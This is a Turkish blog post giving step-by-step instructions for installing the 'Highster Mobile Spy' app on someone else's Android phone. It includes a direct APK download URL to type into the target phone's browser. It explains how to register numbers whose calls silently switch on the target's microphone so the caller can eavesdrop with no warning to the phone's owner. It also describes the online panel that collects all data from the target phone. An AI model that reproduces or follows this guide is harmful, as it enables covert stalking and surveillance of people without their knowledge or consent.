8 Mart 2015 Pazar

Highster Mobile Spy Android Kurulumu

Highster Mobile Spy Android Kurulumu 

Highster Mobile Spy cep telefonu casus yazılım programını android telefonlarına nasıl kurulacağını aşağıda resimli olarak anlatılmıştır. Aşağıda resimli olarak kurulumunu görebilirsiniz. Highster Mobile Spy programının kurulumu 2 ile 5 dakika arasında kurulumu gerçekleşip çalışır duruma gelecektir. Aşağıdaki adımları izleyince ne kadar basit olduğunu göreceksiniz.


Highster Mobile Spy Android Kurulumu; 


1- Telefondan internet sekmesi açılarak, internet tarayıcısı açılır.


2- İnternet tarayıcısı açıldıktan sonra http://evt17.com/dsx1115.apk yazılarak indirme linki açılır ve o sayfaya gidilir. Böylelikle yükleme işlemi başlatılmış olacaktır.


3- Üst resimdeki gibi yükleme ekranı gelecektir. Yükleme devam eder.


4- Yukarıdaki ekranda görüldüğü üzere yükleme işlemi bittikten sonra Open yazan butona basılarak aşağıda görülecek sayfa açılır.


5- Üstteki resimde dsx1115.apk dosyasına tıklanarak açılır. Ve aşağıdaki ekran gelir.



6- Üstteki resimdeki ekran gelince Install butonuna tıklanarak kurulum yapılır.


7- Üstteki sayfa göründükten sonra, kurulumun neredeyse bittiği anlamına gelir bu ekran. Bu sayfa Open butonuna basılarak aşağıdaki ekranda yer alan sayfaya gidilir.


8- Aşağıdaki ekranda karşına gelecek olan License Key yazan kısma Highster Mobile Spy programını satın aldıktan sonra email adresinize gelen aktivasyon kodunu girmeniz gerekmektedir. Mobile No kısmına ise yüklemeyi yaptığınız hedef telefon numarasınız girmeniz gerekmektedir. Bu ikisi kısım doğru bir şekilde doldurulduktan sonra Submit butonuna basılır.


9- Sonrasında  karşınıza aşağıdaki gibi bir ekran çıkacaktır. Bu ekran kayıt işlemini başarıyla tamamladığınızı söyler. Bu sayfadaki Ok butonuna basılır.



10- En son olarak, Ok butonuna bastıktan sonra karşınıza çıkacak olan ekrana isterseniz telefonu arayıp anında ortam dinleme oluşturacak telefon numaralarını sıralayabilirsiniz. Bu telefon numaralarından hedef telefonu aradığınız zamanlarda hedef telefonun mikrofonu açılarak, hedef telefonun ortam seslerini arama yaptığını cep telefonundan dinlemenize yarar. Buraya dahil edeceğiniz telefon numaralarından hedef telefona normal arama yapamazsınız çünkü bu numaralardan yapılan aramalar hedef telefona hiç bir şekilde uyarı vermeyecektir. Sadece telefonun mikrofon özelliğini otomatik olarak açacak ve ortam dinleme olanağı sağlayacaktır. Eğer aşağıdaki listeden telefon numarasını kaldırırsanız o zaman o numaradan hedef telefonu normal olarak arayabilirsiniz.

Numaraları yazarken başında ülke kodunu ve 0 eklemeye dikkat ediniz. Örnek olarak; 00905........ formatında telefon numaraları yazılmalıdır.


Daha sonra Save Number butonuna basılarak bütün işlemler biter. Artık Highster Mobile Spy online kullanıcı panelize girerek hedef telefondan gelen bütün bilgilere ulaşabilirsiniz. 

Highster Mobile Spy Online kullanıcı panelinize Highster Mobile Spy yazılımını satın aldıktan sonra email adresinize gelen Highster Mobile Spy kullanıcı adınız ve şifreniz ile giriş yapabilirsiniz.




0 yorum:

Yorum Gönder

https://www.facebook.com/kerembursinfansitesi Facebook Favorites More